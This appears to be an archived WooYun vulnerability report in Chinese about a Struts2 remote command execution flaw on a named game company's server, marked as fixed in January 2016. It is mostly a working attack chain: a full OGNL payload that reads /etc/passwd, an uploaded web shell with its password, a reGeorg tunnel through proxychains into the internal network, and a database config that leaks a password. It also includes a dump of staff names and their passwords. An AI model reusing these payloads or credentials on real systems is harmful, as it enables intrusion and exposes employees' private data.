乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-02: 细节已通知厂商并且等待厂商处理中 2016-01-06: 厂商已经确认,细节仅向厂商公开 2016-01-06: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商打算送我礼物,礼尚往来,新年我就再送个洞给你们吧
Struts2远程命令执行
http://oss.cmge.com/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%[email protected]@getRequest%28%29,%[email protected]@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29
上传一句话 http://oss.cmge.com/config.jsp
ifconfigem1 Link encap:Ethernet HWaddr F8:BC:12:4A:AB:0C inet addr:123.59.73.98 Bcast:123.59.73.111 Mask:255.255.255.240 inet6 addr: fe80::fabc:12ff:fe4a:ab0c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:234690100 errors:0 dropped:0 overruns:0 frame:0 TX packets:191975833 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:111717497757 (104.0 GiB) TX bytes:55754980927 (51.9 GiB) Interrupt:35 em2 Link encap:Ethernet HWaddr F8:BC:12:4A:AB:0D inet addr:10.200.130.7 Bcast:10.200.130.255 Mask:255.255.255.0 inet6 addr: fe80::fabc:12ff:fe4a:ab0d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:228082396 errors:0 dropped:0 overruns:0 frame:0 TX packets:328168633 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:102848879805 (95.7 GiB) TX bytes:173878904275 (161.9 GiB) Interrupt:38 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:69850555 errors:0 dropped:0 overruns:0 frame:0 TX packets:69850555 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:104502101713 (97.3 GiB) TX bytes:104502101713 (97.3 GiB)
查看数据库配置文件
#database.jdbc.url=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8database.jdbc.url.shaolin=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8database.jdbc.url.daota=jdbc:mysql://10.200.130.8:3306/goanaysis_daota?useUnicode=true&characterEncoding=UTF-8database.jdbc.url.xingzhan=jdbc:mysql://10.200.130.8:3306/goanaysis_xzhan?useUnicode=true&characterEncoding=UTF-8database.user=lhm_rwdatabase.pwd=w&*&PO96>dLD38L)_(HK1P4^LHM^%a
这密码牛逼站库分离,上传tunnel.jsp, reGeorg+proxychains代理进入内网,内网存活主机太少,看来被隔离了直接连接数据库吧
$ python reGeorgSocksProxy.py -p 9527 -u http://oss.cmge.com/tunnel.jsp$ proxychains mysql -h 10.200.130.8 -u lhm_rw -p
mysql> select * from MANAGE_USER;
全是弱口令
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+| id | UserName | Passwd | TrueName | Sex | Org | RoleId | CreateTime | CreatorId | LastUpdateTime | LastUpdateUserId |+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+| 40 | root | abc321 | 超级管理员 | 1 | 00 | 40 | 2012-12-13 00:00:00 | 0 | 2015-01-14 14:09:28 | 40 || 99 | ken | abc321 | 肖健 | 1 | | 75 | 2015-08-28 15:41:56 | 40 | 2015-08-28 15:41:56 | 40 || 101 | oscar | abc321 | 陈韬 | 1 | | 75 | 2015-08-30 00:00:00 | 40 | 2015-10-09 16:29:33 | 40 || 107 | danny | abc321 | 许光翔 | 1 | | 75 | 2015-08-31 09:41:58 | 40 | 2015-08-31 09:41:58 | 40 || 109 | luke | abc321 | 王晓霖 | 1 | | 75 | 2015-08-31 09:42:31 | 40 | 2015-08-31 09:42:31 | 40 || 110 | adam | abc123 | 梁红明 | 1 | | 75 | 2015-09-08 09:51:28 | 40 | 2015-09-08 09:51:28 | 40 || 111 | thor | abc321 | 才健楠 | 1 | | 76 | 2015-10-09 00:00:00 | 40 | 2015-11-13 14:16:15 | 40 || 112 | alan | abc321 | 彭鹏飞 | 1 | | 75 | 2015-10-10 16:47:42 | 40 | 2015-10-10 16:47:42 | 40 || 113 | huanghui | abc321 | 黄辉 | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-11-13 14:15:59 | 40 || 114 | will | abc321 | will | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-11-13 14:15:50 | 40 || 116 | chenfeng | abc321 | 陈峰 | 1 | | 76 | 2015-10-22 00:00:00 | 40 | 2015-10-22 16:46:53 | 40 || 117 | zhangsonlin | abc321 | 张松林 | 1 | | 77 | 2015-10-26 18:11:55 | 40 | 2015-10-26 18:11:55 | 40 || 118 | liminmin | abc321 | 李敏敏 | 2 | | 76 | 2015-10-27 14:38:09 | 40 | 2015-10-27 14:38:09 | 40 || 119 | likeyu | abc123 | 李科宇 | 1 | | 77 | 2015-11-13 15:06:51 | 40 | 2015-11-13 15:06:51 | 40 || 120 | zhangxin | abc123 | 张鈊 | 1 | | 77 | 2015-11-13 15:07:33 | 40 | 2015-11-13 15:07:33 | 40 || 121 | huwenming | abc123 | 胡文明 | 1 | | 77 | 2015-11-13 15:07:54 | 40 | 2015-11-13 15:07:54 | 40 || 122 | chenpeng | abc123 | 陈鹏 | 1 | | 76 | 2015-11-13 00:00:00 | 40 | 2015-12-21 18:08:16 | 40 || 123 | fengmingma | abc321 | [email protected] | 1 | | 76 | 2015-12-23 15:30:35 | 40 | 2015-12-23 15:30:35 | 40 |+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
http://oss.cmge.com/config.jsp密码 wooyun
升级
危害等级:高
漏洞Rank:15
确认时间:2016-01-06 10:48
已经通知开发升级补丁,感谢!
2016-01-06:已修复